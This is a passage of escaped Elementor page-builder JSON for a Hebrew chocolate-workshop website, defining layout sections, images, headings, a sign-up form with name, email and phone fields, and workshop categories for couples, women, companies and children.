settings=\\\"%7B%7D\\\"]\"},\"width\":{\"unit\":\"px\",\"size\":120},\"width_mobile\":{\"unit\":\"px\",\"size\":80},\"align_mobile\":\"left\",\"image\":{\"id\":\"38\",\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/placeholder.png\"},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"theme-site-logo\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"376ec0e9\",\"elType\":\"section\",\"settings\":{\"background_background\":\"gradient\",\"background_color\":\"#e8e8e8\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"60\",\"bottom\":\"0\",\"left\":\"60\",\"isLinked\":false},\"gap\":\"no\",\"background_color_b\":\"#f4f4f4\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"20\",\"bottom\":\"10\",\"left\":\"20\",\"isLinked\":false},\"sticky\":\"top\"},\"elements\":[{\"id\":\"2a6711cf\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size_mobile\":100},\"elements\":[{\"id\":\"66f452c6\",\"elType\":\"widget\",\"settings\":{\"align_items\":\"justify\",\"animation_line\":\"grow\",\"animation_text\":\"none\",\"color_menu_item\":\"#7a7a7a\",\"color_menu_item_hover\":\"#ffffff\",\"pointer_color_menu_item_hover\":\"#02d3c9\",\"menu_typography_typography\":\"custom\",\"menu_typography_font_size\":{\"unit\":\"px\",\"size\":15},\"pointer_width\":{\"unit\":\"px\",\"size\":3},\"color_dropdown_item\":\"#000000\",\"background_color_dropdown_item\":\"#f2f2f2\",\"color_dropdown_item_hover\":\"#02d3c9\",\"background_color_dropdown_item_hover\":\"#ededed\",\"dropdown_typography_typography\":\"custom\",\"dropdown_typography_font_size\":{\"unit\":\"px\",\"size\":15},\"toggle_color\":\"#02d3c9\",\"toggle_color_hover\":\"#54595f\",\"toggle_size\":{\"unit\":\"px\",\"size\":30},\"toggle_border_width\":{\"unit\":\"px\",\"size\":0},\"toggle_border_radius\":{\"unit\":\"px\",\"size\":0},\"pointer\":\"background\",\"menu_typography_text_transform\":\"uppercase\",\"dropdown\":\"mobile\",\"full_width\":\"stretch\",\"color_menu_item_active\":\"#000000\",\"animation_background\":\"sweep-down\",\"padding_vertical_menu_item\":{\"unit\":\"px\",\"size\":18},\"toggle_background_color\":\"rgba(0,0,0,0)\"},\"elements\":[],\"widgetType\":\"nav-menu\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7e94e72f\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"height\":\"min-height\",\"custom_height\":{\"unit\":\"vh\",\"size\":\"60\"},\"column_position\":\"stretch\",\"background_background\":\"classic\",\"background_image\":{\"id\":35,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/HDR.jpg\"},\"background_position\":\"center center\",\"background_size\":\"cover\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"25\",\"bottom\":\"40\",\"left\":\"25\",\"isLinked\":false}},\"elements\":[{\"id\":\"3b866986\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"rgba(255,255,255,0.73)\",\"margin\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"63\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"53\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5c8a61fd\",\"elType\":\"widget\",\"settings\":{\"image\":{\"id\":33,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/logoup.png\"},\"space\":{\"unit\":\"%\",\"size\":18},\"_padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"_background_background\":\"classic\",\"_background_color\":\"#f1d5ad\",\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"1f909fe7\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05dc\\u05d8\\u05e2\\u05d5\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d0\\u05d9\\u05db\\u05d5\\u05ea\\u05d9 \\u05d1\\u05d9\\u05d5\\u05dd \\u05d0\\u05d7\\u05d3 \\u05d8\\u05e2\\u05d9\\u05dd \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#40272c\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":\"45\"},\"typography_font_weight\":\"100\",\"typography_line_height\":{\"unit\":\"em\",\"size\":\"0.9\"},\"_padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"38\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"35\"},\"_padding_tablet\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"10\",\"left\":\"0\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"15\",\"right\":\"0\",\"bottom\":\"15\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"35481412\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05d1\\u05d5\\u05d0\\u05d5 \\u05dc\\u05d4\\u05d9\\u05e8\\u05e9\\u05dd \\u05dc\\u05e1\\u05d3\\u05e0\\u05ea \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d4\\u05e7\\u05e8\\u05d5\\u05d1\\u05d4\",\"align\":\"center\",\"title_color\":\"#40272c\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":\"22\"},\"typography_font_weight\":\"bold\",\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"20\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"18\"}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"41e0dd23\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"field_type\":\"text\",\"field_label\":\"\\u05e9\\u05dd\",\"placeholder\":\"\\u05e9\\u05dd\",\"width\":\"100\",\"_id\":\"eovd5tr\",\"required\":\"true\",\"field_options\":\"\",\"inline_list\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"field_html\":\"\",\"custom_id\":\"eovd5tr\"},{\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"placeholder\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"width\":\"100\",\"_id\":\"68frv7y\",\"field_options\":\"\",\"inline_list\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"field_html\":\"\",\"custom_id\":\"68frv7y\"},{\"field_type\":\"tel\",\"field_label\":\"\\u05d8\\u05dc\'\",\"placeholder\":\"\\u05d8\\u05dc\'\",\"width\":\"100\",\"_id\":\"p0rl9g7\",\"required\":\"\",\"field_options\":\"\",\"inline_list\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"field_html\":\"\",\"custom_id\":\"p0rl9g7\"}],\"show_labels\":\"\",\"button_text\":\"\\u05d2\\u05dd \\u05d0\\u05e0\\u05d9 \\u05e8\\u05d5\\u05e6\\u05d4 \\u05dc\\u05d4\\u05d9\\u05e8\\u05e9\\u05dd \\u05dc\\u05e1\\u05d3\\u05e0\\u05d4!\",\"success_message\":\"The message was sent successfully!\",\"error_message\":\"There\'s something wrong... Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong... The form is invalid.\",\"column_gap\":{\"unit\":\"px\",\"size\":\"10\"},\"row_gap\":{\"unit\":\"px\",\"size\":\"15\"},\"field_text_color\":\"#54595f\",\"field_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"field_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_typography_typography\":\"custom\",\"button_typography_font_weight\":\"bold\",\"button_typography_letter_spacing\":{\"unit\":\"px\",\"size\":\"3\"},\"button_background_color\":\"#5c0011\",\"button_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_text_padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":false},\"field_typography_typography\":\"custom\",\"field_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"13\"},\"button_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"14\"},\"_padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"22\",\"bottom\":\"22\",\"left\":\"22\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":false},\"button_background_hover_color\":\"#40272c\",\"input_size\":\"md\",\"button_size\":\"md\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_content\":\"[all-fields]\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_content_2\":\"[all-fields]\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4f74ca63\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#e3e0dd\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"100\",\"bottom\":\"100\",\"left\":\"100\",\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"20\",\"bottom\":\"70\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[{\"id\":\"655473aa\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"55.702\",\"margin\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"12\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"13679594\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05d1\\u05d5\\u05d0\\u05d5 \\u05dc\\u05d0\\u05db\\u05d5\\u05dc \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e2\\u05dd \\u05d7\\u05d1\\u05e8\\u05d9\\u05dd\",\"align\":\"right\",\"title_color\":\"#40272c\",\"typography_font_size\":{\"unit\":\"px\",\"size\":\"35\"},\"typography_font_family\":\"Damion\",\"typography_font_weight\":\"100\",\"typography_text_transform\":\"capitalize\",\"typography_line_height\":{\"unit\":\"em\",\"size\":\"1\"},\"align_mobile\":\"center\",\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"31\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"30\"}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"66f30f3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u05db\\u05d5\\u05dc\\u05e0\\u05d5 \\u05d0\\u05d5\\u05d4\\u05d1\\u05d9\\u05dd \\u05d0\\u05ea \\u05d4\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7 \\u05e9\\u05d0\\u05d7\\u05e8\\u05d9, \\u05d7\\u05dc\\u05e7\\u05e0\\u05d5 \\u05d0\\u05e4\\u05d9\\u05dc\\u05d5 \\u05d0\\u05d5\\u05db\\u05dc\\u05d9\\u05dd \\u05e4\\u05d7\\u05d5\\u05ea \\u05d1\\u05d0\\u05e8\\u05d5\\u05d7\\u05ea \\u05d4\\u05e2\\u05e8\\u05d1 \\u05e8\\u05e7 \\u05db\\u05d3\\u05d9 \\u05e9\\u05e0\\u05d5\\u05db\\u05dc \\u05dc\\u05e0\\u05e6\\u05dc \\u05d0\\u05ea \\u05ea\\u05e4\\u05e8\\u05d9\\u05d8 \\u05d4\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05e2\\u05d3 \\u05ea\\u05d5\\u05de\\u05d5, \\u05d0\\u05d6 \\u05dc\\u05de\\u05d4 \\u05e9\\u05dc\\u05d0 \\u05e0\\u05e2\\u05e9\\u05d4 \\u05d9\\u05d5\\u05dd \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd?<\\/p><p>\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e0\\u05d5\\u05e6\\u05e8\\u05d5 \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3 \\u05dc\\u05e8\\u05d2\\u05e2\\u05d9\\u05dd \\u05d4\\u05d0\\u05dc\\u05d4, \\u05e9\\u05e0\\u05d5\\u05db\\u05dc \\u05dc\\u05d4\\u05d2\\u05d9\\u05e2 \\\"\\u05db\\u05de\\u05e2\\u05d8 \\u05e9\\u05d1\\u05e2\\u05d9\\u05dd\\\" \\u05d5\\u05dc\\u05d9\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05de\\u05d2\\u05d5\\u05d5\\u05df \\u05de\\u05d0\\u05db\\u05dc\\u05d9\\u05dd \\u05d8\\u05e2\\u05d9\\u05de\\u05d9\\u05dd \\u05e9\\u05e1\\u05d5\\u05d1\\u05d1\\u05d9\\u05dd \\u05e1\\u05d1\\u05d9\\u05d1 \\u05d4\\u05d0\\u05d5\\u05db\\u05dc \\u05d4\\u05de\\u05ea\\u05d5\\u05e7 \\u05d4\\u05d0\\u05d4\\u05d5\\u05d1 \\u05e2\\u05dc \\u05db\\u05d5\\u05dc\\u05e0\\u05d5, \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3. \\u05d4\\u05d7\\u05dc \\u05de\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05de\\u05e8\\u05d9\\u05e8 \\u05d5\\u05e2\\u05d3 \\u05dc\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e0\\u05d5\\u05d6\\u05dc, \\u05d4\\u05db\\u05dc \\u05e2\\u05dc \\u05de\\u05e0\\u05ea \\u05dc\\u05d9\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05d9\\u05d5\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\u05d9 \\u05dc\\u05de\\u05d3\\u05d9 \\u05d1\\u05db\\u05dc \\u05e6\\u05d5\\u05e8\\u05d4 \\u05d5\\u05e6\\u05d1\\u05e2, \\u05db\\u05dc \\u05d3\\u05e8\\u05da \\u05d5\\u05e9\\u05e2\\u05d4.\\u00a0<\\/p>\",\"text_color\":\"#54595f\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":19},\"typography_font_family\":\"Open Sans Hebrew\",\"typography_line_height\":{\"unit\":\"em\",\"size\":\"1.6\"},\"align_mobile\":\"center\",\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"14\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"17\"},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"15f91cbb\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"44.298\",\"margin\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"content_position\":\"center\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"385ae28\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/inner-hp.jpg\",\"id\":26}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4477cb\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"structure\":\"40\",\"background_background\":\"classic\",\"background_color\":\"#ffffff\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"100\",\"bottom\":\"100\",\"left\":\"100\",\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"25\",\"bottom\":\"50\",\"left\":\"25\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"20\",\"bottom\":\"60\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[{\"id\":\"702ee38f\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"24\",\"bottom\":\"0\",\"left\":\"24\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"screen_sm\":\"custom\",\"screen_sm_width\":\"50\"},\"elements\":[{\"id\":\"60600fc4\",\"elType\":\"widget\",\"settings\":{\"image\":{\"id\":32,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/c-couple.png\"},\"title_text\":\"\",\"description_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea\",\"image_space\":{\"unit\":\"px\",\"size\":30},\"image_size\":{\"unit\":\"%\",\"size\":\"75\"},\"description_color\":\"#40272c\",\"description_typography_font_size\":{\"unit\":\"px\",\"size\":\"25\"},\"description_typography_font_family\":\"Damion\",\"description_typography_line_height\":{\"unit\":\"em\",\"size\":\"1\"},\"description_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"19\"},\"description_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"20\"}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"f9b0ce7\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"24\",\"bottom\":\"0\",\"left\":\"24\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"screen_sm\":\"custom\",\"screen_sm_width\":\"50\"},\"elements\":[{\"id\":\"6945b5b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"id\":31,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/c-woman.png\"},\"title_text\":\"\",\"description_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea\",\"image_space\":{\"unit\":\"px\",\"size\":30},\"image_size\":{\"unit\":\"%\",\"size\":\"75\"},\"description_color\":\"#40272c\",\"description_typography_font_size\":{\"unit\":\"px\",\"size\":\"25\"},\"description_typography_font_family\":\"Damion\",\"description_typography_line_height\":{\"unit\":\"em\",\"size\":\"1\"},\"description_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"19\"},\"description_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"20\"}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"fa7a00f\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"24\",\"bottom\":\"0\",\"left\":\"24\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"screen_sm\":\"custom\",\"screen_sm_width\":\"50\"},\"elements\":[{\"id\":\"afa7d0f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"id\":28,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/c-company.png\"},\"title_text\":\"\",\"description_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea\",\"image_space\":{\"unit\":\"px\",\"size\":30},\"image_size\":{\"unit\":\"%\",\"size\":\"75\"},\"description_color\":\"#40272c\",\"description_typography_font_size\":{\"unit\":\"px\",\"size\":\"25\"},\"description_typography_font_family\":\"Damion\",\"description_typography_line_height\":{\"unit\":\"em\",\"size\":\"1\"},\"description_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"19\"},\"description_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"20\"}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"4a4b992\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"24\",\"bottom\":\"0\",\"left\":\"24\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"screen_sm\":\"custom\",\"screen_sm_width\":\"50\"},\"elements\":[{\"id\":\"c498248\",\"elType\":\"widget\",\"settings\":{\"image\":{\"id\":30,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/c-kids.png\"},\"title_text\":\"\",\"description_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd\",\"image_space\":{\"unit\":\"px\",\"size\":30},\"image_size\":{\"unit\":\"%\",\"size\":\"75\"},\"description_color\":\"#40272c\",\"description_typography_font_size\":{\"unit\":\"px\",\"size\":\"25\"},\"description_typography_font_family\":\"Damion\",\"description_typography_line_height\":{\"unit\":\"em\",\"size\":\"1\"},\"description_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"19\"},\"description_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"20\"}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5684ff50\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"id\":24,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/michael-browning-188999.png\"},\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"#190606\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.75},\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"100\",\"bottom\":\"100\",\"left\":\"100\",\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"115\",\"bottom\":\"50\",\"left\":\"115\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"20\",\"bottom\":\"40\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[{\"id\":\"74663cd\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"125f3fc\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05de\\u05d4 \\u05d4\\u05e9\\u05d1\\u05e2\\u05d9\\u05dd \\u05d4\\u05de\\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05e9\\u05dc\\u05e0\\u05d5 